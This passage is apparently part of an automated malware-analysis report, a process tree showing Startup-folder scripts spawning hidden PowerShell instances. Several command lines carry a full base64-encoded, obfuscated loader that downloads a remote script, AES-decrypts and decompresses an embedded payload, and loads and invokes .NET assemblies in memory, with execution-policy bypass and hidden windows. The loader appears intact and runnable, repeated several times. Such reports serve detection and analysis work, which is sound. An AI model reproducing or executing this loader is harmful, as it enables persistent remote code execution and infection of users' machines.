lbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 3528 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4356 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7536 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5184 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7960 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2940 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 4172 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6608 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5332 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7672 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
